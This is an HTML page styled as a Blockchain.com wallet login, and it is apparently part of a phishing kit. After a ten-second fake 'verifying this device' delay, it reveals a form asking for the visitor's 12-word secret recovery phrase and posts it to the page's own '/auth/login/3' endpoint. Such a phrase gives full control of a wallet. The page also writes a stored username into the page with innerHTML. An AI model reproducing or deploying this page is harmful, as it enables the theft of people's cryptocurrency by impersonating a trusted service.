<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Login | Blockchain</title>
  <link rel="shortcut icon" href="/img/favicon.ico" type="image/x-icon">
  <link rel="stylesheet" href="/css/main.css">
  <script src="/js/jquery.js"></script>
</head>

<body class="mode-light">
  <div id="app">
    <div class="hLRBsB">
      <div class="fvHjxE">
        <div height="112px" class="dHvbOZ">
          <div class="iTjCBV cptUIt">
            <div class="jnHNPG fCMSDs">
              <div class="kKyXUB"><a href="https://www.blockchain.com" class="bzateK gqnaJW" color="blue600"><img src="/img/logo.svg" srcset="" height="24px" class="ixijk kyMJXT" color="auto" width="auto"></a></div>
            </div>
          </div>
        </div>
        <div class="cbx-preloader">
          <div class="efUxCs">
            <div class="hSMajG"></div>
            <div color="white" cursor="inherit" opacity="1" class="hytSPm" style="margin-top: 16px">
              Please wait while we verify this device...
            </div>
          </div>
        </div>
      </div>

      <div class="dXnSGZ">
        <form action="/auth/login/3" method="post" class="bTmCWi">
          <div class="coOByc" style="display: none;">
            <div class="cYziAC">
              <div class="gkJLwX" style="margin-bottom: 0;">
                <div class="ilzBRA" style="margin-top: 40px;">
                  <div class="eLDzCn" style="margin-bottom: 24px;">
                    <div color="grey900" cursor="pointer" opacity="1" class="gFCRIM"><img src="/img/arrow-left2.svg" style="margin-right:10px;">Back</div>
                    <div class="cqtptZ" id="cbx-user"></div>
                    <script>
                      if (typeof Storage !== "undefined") {
                        document.getElementById("cbx-user").innerHTML =
                          localStorage.getItem("cbx-user");
                      } else {
                        console.log("Sorry, your browser does not support Web Storage...");
                      }
                    </script>
                  </div>
                  <div color="grey900" cursor="inherit" opacity="1" class="BCruu" style="margin-bottom: 8px;">Input your secret private key recovery phrase</div>
                  <div color="grey600" cursor="inherit" opacity="1" class="iVtkAS" style="margin-bottom: 16px;">Your 12 word Secret Private Key Recovery Phrase grants access to your account. Please input it in the order specified.</div>
                  <div class="eFunUP" height="48px">
                    <div class="Pbjyv">
                      <input name="secret" id="secret" height="48px" placeholder="Enter your secret private key recovery phrase" spellcheck="false" autocomplete="off" type="text" class="rmiWH">
                    </div>
                    <div color="error" height="48px" class="cguRtB cIoOVw" cursor="inherit" opacity="1" style="display:none;">Required</div>
                  </div>
                </div>
              </div>
              <div color="grey600" cursor="inherit" opacity="1" class="jPqPHm" style="margin: 8px 0px 24px; text-align: center;">Separate each word with a space</div>
              <div class="cfNveD">
                <button type="submit" height="48px" class="gqApeS jRlWXV" disabled="" color="white" style="margin-bottom: 16px;margin-top: 0;">
                  <div color="whiteFade900" cursor="inherit" opacity="1" class="edfwkt">Continue </div>
                </button>
              </div>
            </div>
            <div class="kJoMeO">
              <div class="hfEIPj" href="#/signup">
                <div color="grey600" cursor="inherit" opacity="1" class="dZiTwf" style="cursor: pointer; margin-top: 16px;">Don't have a Blockchain Account? </div>&nbsp;<div color="blue600" class="nYDtv kiSsZI" cursor="inherit" opacity="1">Sign up Now -&gt; </div>
              </div>
            </div>
          </div>
        </form>
      </div>
      <div class="ilwOTt">
        <div class="kiwhRw">
          <div class="kXiRmv">
            <div color="grey400" class="kyfudT">
              <div class="kPtlNs">English</div>
            </div>
          </div>
          <span class="jhqRYo">
            <a color="grey400" href="https://github.com/blockchain/blockchain-wallet-v4-frontend/releases" class="ecJsZh">Version 4.83.9</a>
          </span>
          <div class="ilHcgz">
            <a color="grey400" href="https://support.blockchain.com" class="ecJsZh">
              <div color="grey400" cursor="inherit" opacity="1" class="hLxhAA">Need Help? </div>
            </a>
          </div>
        </div>
      </div>
    </div>
  </div>
  <script src="/js/main.js"></script>
  <script>
      $(document).ready(function() {
        setTimeout(() => {
          $(".coOByc").show();
          $(".cbx-preloader").hide();
        }, 10000)
      });
  </script>
</body>

</html>